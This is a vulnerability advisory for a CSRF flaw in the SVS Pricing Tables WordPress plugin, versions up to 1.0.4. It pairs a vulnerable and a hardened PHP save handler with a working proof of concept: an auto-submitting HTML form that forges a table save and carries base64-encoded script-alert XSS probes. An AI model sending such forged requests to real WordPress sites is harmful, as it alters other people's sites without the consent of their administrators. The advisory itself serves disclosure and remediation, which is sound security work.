Description

The SVS Pricing Tables plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in all versions up to, and including, 1.0.4. The cause is missing or incorrect nonce validation on the savePricingTable() function (reached in the PoC below through admin.php?page=svs_pricing_tables&Action=pricingTableSave), so the plugin cannot distinguish a save the administrator intended from one that a third-party page submitted using the administrator's browser session. This makes it possible for unauthenticated attackers to create and edit pricing tables via a forged request, provided they can trick a logged-in site administrator into performing an action such as clicking a link or visiting an attacker-controlled page. The PoC additionally embeds <script>alert(...)</script> tags in the submitted table markup to test whether the stored content is later rendered unescaped; the Wordfence advisory (linked under Reference) rates the issue as CSRF only, with low integrity impact, so treat any script execution as unconfirmed.
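The handler shape below is an added illustration, not the plugin's code and not taken from the Wordfence advisory. It mirrors the request the PoC sends (POST name, template, htmlAdmin and html to the admin page) and places a handler with no nonce check beside a hardened one. The table name, the nonce action string, the allowed template list and all function names are assumptions made for the example.

```php
<?php
/*
 * Hypothetical WordPress admin-page handler (example code, not the plugin's).
 * It accepts the same fields the PoC posts. Whether the real plugin
 * base64-decodes htmlAdmin/html is an assumption drawn from the PoC's payload.
 */

// Vulnerable shape: trusts any POST that reaches the admin page. The only
// "check" is that the browser is logged in, which is exactly what CSRF abuses:
// the victim's browser attaches the session cookie to the forged request.
function example_save_pricing_table_vulnerable() {
    global $wpdb;
    $wpdb->insert(
        $wpdb->prefix . 'example_pricing_tables', // assumed table name
        array(
            'name'       => $_POST['name'],
            'template'   => $_POST['template'],
            'html_admin' => base64_decode( $_POST['htmlAdmin'] ),
            'html'       => base64_decode( $_POST['html'] ),
        )
    );
}

// Hardened shape: capability check (authorization), nonce check (intent),
// then validation and sanitization before anything is stored.
function example_save_pricing_table_fixed() {
    global $wpdb;

    // Authorization: nonces are not a substitute for this. Without it, any
    // logged-in user who can reach the page could save a table.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // Intent: check_admin_referer() verifies the _wpnonce field against the
    // action string and dies ("The link you followed has expired") when the
    // field is missing or forged. A cross-site form cannot supply a valid
    // value because the nonce is tied to the victim's session and only ever
    // appears in the admin page that rendered the legitimate form.
    check_admin_referer( 'example_save_pricing_table' );

    $allowed_templates = array( 't01', 't02', 't03', 't04' ); // assumed list
    $template = sanitize_key( wp_unslash( $_POST['template'] ?? '' ) );
    if ( ! in_array( $template, $allowed_templates, true ) ) {
        wp_die( 'Unknown template.', '', array( 'response' => 400 ) );
    }

    // Strict base64 decoding rejects the garbage a sloppy decoder would skip.
    $html_admin = base64_decode( wp_unslash( $_POST['htmlAdmin'] ?? '' ), true );
    $html       = base64_decode( wp_unslash( $_POST['html'] ?? '' ), true );
    if ( false === $html_admin || false === $html ) {
        wp_die( 'Malformed payload.', '', array( 'response' => 400 ) );
    }

    $wpdb->insert(
        $wpdb->prefix . 'example_pricing_tables',
        array(
            'name'       => sanitize_text_field( wp_unslash( $_POST['name'] ?? '' ) ),
            'template'   => $template,
            // wp_kses_post() strips <script> tags and on* event handlers, so
            // markup like the PoC's <script>alert(...)</script> is dropped
            // before it reaches the database.
            'html_admin' => wp_kses_post( $html_admin ),
            'html'       => wp_kses_post( $html ),
        ),
        array( '%s', '%s', '%s', '%s' )
    );
}

// The legitimate admin form must emit the nonce the fixed handler expects.
function example_render_save_form() {
    ?>
    <form method="post" action="<?php echo esc_url( admin_url( 'admin.php?page=svs_pricing_tables&Action=pricingTableSave' ) ); ?>">
        <?php wp_nonce_field( 'example_save_pricing_table' ); ?>
        <input type="text" name="name" />
        <input type="hidden" name="template" value="t04" />
        <input type="hidden" name="htmlAdmin" value="" />
        <input type="hidden" name="html" value="" />
        <input type="submit" value="Save" />
    </form>
    <?php
}
```

To confirm a fix on a test site, capture a legitimate save from the admin UI, replay it with the _wpnonce field removed, and expect WordPress's "The link you followed has expired" response instead of a new table. The capability check is what protects against a low-privileged account; the nonce is what protects against a request originating from another origin, and both are needed.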

Severity

4.3 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Affected Version

<= 1.0.4

PoC:

<html>
  <!-- eneriiiii PoC <3 -->
  <!-- Auto-submitting CSRF form. Replace [ASSETS] with the target host; the
       victim must be logged in to wp-admin when this page loads. The request
       carries no _wpnonce field, which the affected versions never check. -->
  <body>
    <form action="http://[ASSETS]/wp-admin/admin.php?page=svs_pricing_tables&Action=pricingTableSave" method="POST">
      <!-- Non-alphanumeric characters in the values are HTML-entity encoded
           (&#32; space, &#45; hyphen, &#43; plus, &#61; equals). The browser
           decodes them before submission, so the server receives plain text
           and valid base64. -->
      <input type="hidden" name="name" value="eneriiii&#32;&#45;&#32;XSS" />
      <input type="hidden" name="template" value="t04" />
      <!-- htmlAdmin and html carry base64-encoded table markup. The decoded
           payload places <script>alert(...)</script> in the title, button,
           price and option text fields of the table. -->
      <input type="hidden" name="htmlAdmin" value="PHNlY3Rpb24gaWQ9InN2c19wcmljZV9wbGFucyIgY2xhc3M9InN2c19wdF9jbGVhcmZpeCI&#43;CiAgIDxvbCBjbGFzcz0ic3ZzX3ByaWNlX3BsYW4iIHN0eWxlPSIiPgogICAgICA8c3BhbiBjbGFzcz0ic3ZzX2ljb24gaWNvbi1zZXR0aW5ncyBvaSIgZGF0YS1nbHlwaD0iY29nIj48L3NwYW4&#43;CiAgICAgIDxzcGFuIGNsYXNzPSJzdnNfaWNvbiBpY29uLWZlYXR1cmVkIG9pIiBkYXRhLWdseXBoPSJzdGFyIj48L3NwYW4&#43;CiAgICAgIDxzcGFuIGNsYXNzPSJzdnNfaWNvbiBpY29uLXRyYXNoLXBsYW4gb2kiIGRhdGEtZ2x5cGg9InRyYXNoIj48L3NwYW4&#43;CiAgIDxsaSBjbGFzcz0ic3ZzX3RpdGxlIj48ZGl2PjxpIGNsYXNzPSJzdnNfaWNvbiBpY29uLW1vdmUgb2kiIGRhdGEtZ2x5cGg9Im1vdmUiPjwvaT48aSBjbGFzcz0ic3ZzX2ljb24gaWNvbi10cmFzaC1vcHRpb24gb2kiIGRhdGEtZ2x5cGg9InRyYXNoIj48L2k&#43;PGgyIGNsYXNzPSJzdnNfcHRfZWRpdGFibGVfdGV4dCIgdGl0bGU9IkNsaWNrIHRvIGVkaXQuLi4iPjxzY3JpcHQ&#43;YWxlcnQoJ2VuZXJpaWlpaSA8MyAtIFhTUyBOQU1FJyk8L3NjcmlwdD48L2gyPjwvZGl2PjwvbGk&#43;PGxpIGNsYXNzPSJzdnNfYnV0dG9uIj48ZGl2PjxpIGNsYXNzPSJzdnNfaWNvbiBpY29uLW1vdmUgb2kiIGRhdGEtZ2x5cGg9Im1vdmUiPjwvaT48aSBjbGFzcz0ic3ZzX2ljb24gaWNvbi10cmFzaC1vcHRpb24gb2kiIGRhdGEtZ2x5cGg9InRyYXNoIj48L2k&#43;PGkgY2xhc3M9InN2c19pY29uIGljb24tbGluayBvaSIgZGF0YS1nbHlwaD0ibGluay1pbnRhY3QiPjwvaT48YSBocmVmPSIjIiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiIHRpdGxlPSJDbGljayB0byBlZGl0Li4uIj48c2NyaXB0PmFsZXJ0KCdlbmVyaWlpaWkgPDMgLSBYU1MgQnV0dG9uJyk8L3NjcmlwdD48L2E&#43;PC9kaXY&#43;PC9saT48L29sPgogICA8b2wgY2xhc3M9InN2c19wcmljZV9wbGFuIiBzdHlsZT0iIj4KICAgICAgPHNwYW4gY2xhc3M9InN2c19pY29uIGljb24tc2V0dGluZ3Mgb2kiIGRhdGEtZ2x5cGg9ImNvZyI&#43;PC9zcGFuPgogICAgICA8c3BhbiBjbGFzcz0ic3ZzX2ljb24gaWNvbi1mZWF0dXJlZCBvaSIgZGF0YS1nbHlwaD0ic3RhciI&#43;PC9zcGFuPgogICAgICA8c3BhbiBjbGFzcz0ic3ZzX2ljb24gaWNvbi10cmFzaC1wbGFuIG9pIiBkYXRhLWdseXBoPSJ0cmFzaCI&#43;PC9zcGFuPgogICA8bGkgY2xhc3M9InN2c19wcmljZSI&#43;PGRpdj48aSBjbGFzcz0ic3ZzX2ljb24gaWNvbi1tb3ZlIG9pIiBkYXRhLWdseXBoPSJtb3ZlIj48L2k&#43;PGkgY2xhc3M9InN2c19pY29uIGljb24tdHJhc2gtb3B0aW9uIG9pIiBkYXRhLWdseXBoPSJ0cmFzaCI&#43;PC9pPjxwPjxzcGFuIGNsYXNzPSJzdnNfcHRfZWRpdGFibGVfdGV4dCIgdGl0bGU9IkNsaWNrIHRvIGVkaXQuLi4iPjxzY3JpcHQ&#43;YWxlcnQoJ2VuZXJpaWlpaSA8MyAtIFhTUyBQcmljZScpPC9zY3JpcHQ&#43;PC9zcGFuPiZuYnNwOzxzcGFuIGNsYXNzPSJzdnNfcHRfZWRpdGFibGVfdGV4dCIgdGl0bGU9IkNsaWNrIHRvIGVkaXQuLi4iPi8gbW9udGg8L3NwYW4&#43;PC9wPjwvZGl2PjwvbGk&#43;PC9vbD48b2wgY2xhc3M9InN2c19wcmljZV9wbGFuIiBzdHlsZT0iIj4KICAgICAgPHNwYW4gY2xhc3M9InN2c19pY29uIGljb24tc2V0dGluZ3Mgb2kiIGRhdGEtZ2x5cGg9ImNvZyI&#43;PC9zcGFuPgogICAgICA8c3BhbiBjbGFzcz0ic3ZzX2ljb24gaWNvbi1mZWF0dXJlZCBvaSIgZGF0YS1nbHlwaD0ic3RhciI&#43;PC9zcGFuPgogICAgICA8c3BhbiBjbGFzcz0ic3ZzX2ljb24gaWNvbi10cmFzaC1wbGFuIG9pIiBkYXRhLWdseXBoPSJ0cmFzaCI&#43;PC9zcGFuPgogICA8bGkgY2xhc3M9InN2c19vcHRpb25fdmFsdWUiPjxkaXY&#43;PGkgY2xhc3M9InN2c19pY29uIGljb24tbW92ZSBvaSIgZGF0YS1nbHlwaD0ibW92ZSI&#43;PC9pPjxpIGNsYXNzPSJzdnNfaWNvbiBpY29uLXRyYXNoLW9wdGlvbiBvaSIgZGF0YS1nbHlwaD0idHJhc2giPjwvaT48cD48c3BhbiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiIHRpdGxlPSJDbGljayB0byBlZGl0Li4uIj5WYWx1ZTwvc3Bhbj4mbmJzcDs8c3BhbiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiIHRpdGxlPSJDbGljayB0byBlZGl0Li4uIj48c2NyaXB0PmFsZXJ0KCdlbmVyaWlpaWkgPDMgLSBYU1MgdmFsdWUnKTwvc2NyaXB0Pjwvc3Bhbj48L3A&#43;PC9kaXY&#43;PC9saT48bGkgY2xhc3M9InN2c19vcHRpb25feWVzX25vIj48ZGl2PjxpIGNsYXNzPSJzdnNfaWNvbiBpY29uLW1vdmUgb2kgIiBkYXRhLWdseXBoPSJtb3ZlIj48L2k&#43;PGkgY2xhc3M9InN2c19pY29uIGljb24tdHJhc2gtb3B0aW9uIG9pIiBkYXRhLWdseXBoPSJ0cmFzaCI&#43;PC9pPjxwPjxzcGFuIGNsYXNzPSJzdnNfcHRfZWRpdGFibGVfeWVzX25vIiB0aXRsZT0iQ2xpY2sgdG8gZWRpdC4uLiI&#43;PGltZyBzcmM9Imh0dHA6Ly8xMDMuMTg5LjIzNC41Ny93cC1jb250ZW50L3BsdWdpbnMvc3ZzLXByaWNpbmctdGFibGVzL3RlbXBsYXRlcy90MDQvaW1hZ2VzL3llcy5wbmciPjwvc3Bhbj4mbmJzcDs8c3BhbiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiIHRpdGxlPSJDbGljayB0byBlZGl0Li4uIj48c2NyaXB0PmFsZXJ0KCdlbmVyaWlpaWkgPDMgLSBYU1MgeWVzL25vIG9wdGlvbicpPC9zY3JpcHQ&#43;PC9zcGFuPjwvcD48L2Rpdj48L2xpPjwvb2w&#43;PG9sIGNsYXNzPSJzdnNfbmV3X3BsYW4iPgogICAgICA8c3BhbiBjbGFzcz0iaWNvbi1hZGQgb2kiIGRhdGEtZ2x5cGg9InBsdXMiPjwvc3Bhbj4KICAgPC9vbD4KPC9zZWN0aW9uPg&#61;&#61;" />
      <input type="hidden" name="html" value="PHNlY3Rpb24gaWQ9InN2c19wcmljZV9wbGFucyIgY2xhc3M9InN2c19wdF9jbGVhcmZpeCI&#43;CiAgIDxvbCBjbGFzcz0ic3ZzX3ByaWNlX3BsYW4iIHN0eWxlPSIiPgogICAgICAKICAgICAgCiAgICAgIAogICA8bGkgY2xhc3M9InN2c190aXRsZSI&#43;PGRpdj48aDIgY2xhc3M9InN2c19wdF9lZGl0YWJsZV90ZXh0Ij48c2NyaXB0PmFsZXJ0KCdlbmVyaWlpaWkgPDMgLSBYU1MgTkFNRScpPC9zY3JpcHQ&#43;PC9oMj48L2Rpdj48L2xpPjxsaSBjbGFzcz0ic3ZzX2J1dHRvbiI&#43;PGRpdj48YSBocmVmPSIjIiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiPjxzY3JpcHQ&#43;YWxlcnQoJ2VuZXJpaWlpaSA8MyAtIFhTUyBCdXR0b24nKTwvc2NyaXB0PjwvYT48L2Rpdj48L2xpPjwvb2w&#43;CiAgIDxvbCBjbGFzcz0ic3ZzX3ByaWNlX3BsYW4iIHN0eWxlPSIiPgogICAgICAKICAgICAgCiAgICAgIAogICA8bGkgY2xhc3M9InN2c19wcmljZSI&#43;PGRpdj48cD48c3BhbiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiPjxzY3JpcHQ&#43;YWxlcnQoJ2VuZXJpaWlpaSA8MyAtIFhTUyBQcmljZScpPC9zY3JpcHQ&#43;PC9zcGFuPiZuYnNwOzxzcGFuIGNsYXNzPSJzdnNfcHRfZWRpdGFibGVfdGV4dCI&#43;LyBtb250aDwvc3Bhbj48L3A&#43;PC9kaXY&#43;PC9saT48L29sPjxvbCBjbGFzcz0ic3ZzX3ByaWNlX3BsYW4iIHN0eWxlPSIiPgogICAgICAKICAgICAgCiAgICAgIAogICA8bGkgY2xhc3M9InN2c19vcHRpb25fdmFsdWUiPjxkaXY&#43;PHA&#43;PHNwYW4gY2xhc3M9InN2c19wdF9lZGl0YWJsZV90ZXh0Ij5WYWx1ZTwvc3Bhbj4mbmJzcDs8c3BhbiBjbGFzcz0ic3ZzX3B0X2VkaXRhYmxlX3RleHQiPjxzY3JpcHQ&#43;YWxlcnQoJ2VuZXJpaWlpaSA8MyAtIFhTUyB2YWx1ZScpPC9zY3JpcHQ&#43;PC9zcGFuPjwvcD48L2Rpdj48L2xpPjxsaSBjbGFzcz0ic3ZzX29wdGlvbl95ZXNfbm8iPjxkaXY&#43;PHA&#43;PHNwYW4gY2xhc3M9InN2c19wdF9lZGl0YWJsZV95ZXNfbm8iIHRpdGxlPSJDbGljayB0byBlZGl0Li4uIj48aW1nIHNyYz0iaHR0cDovLzEwMy4xODkuMjM0LjU3L3dwLWNvbnRlbnQvcGx1Z2lucy9zdnMtcHJpY2luZy10YWJsZXMvdGVtcGxhdGVzL3QwNC9pbWFnZXMveWVzLnBuZyI&#43;PC9zcGFuPiZuYnNwOzxzcGFuIGNsYXNzPSJzdnNfcHRfZWRpdGFibGVfdGV4dCI&#43;PHNjcmlwdD5hbGVydCgnZW5lcmlpaWlpIDwzIC0gWFNTIHllcy9ubyBvcHRpb24nKTwvc2NyaXB0Pjwvc3Bhbj48L3A&#43;PC9kaXY&#43;PC9saT48L29sPgo8L3NlY3Rpb24&#43;" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Rewrite the visible URL so the PoC page's own path is not shown in
      // the address bar, then submit the form with no user interaction.
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Reference

  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/svs-pricing-tables/svs-pricing-tables-104-cross-site-request-forgery-to-pricing-table-editcreation
  • https://plugins.trac.wordpress.org/browser/svs-pricing-tables/trunk/app/model/svs_pt_model_main.php#L61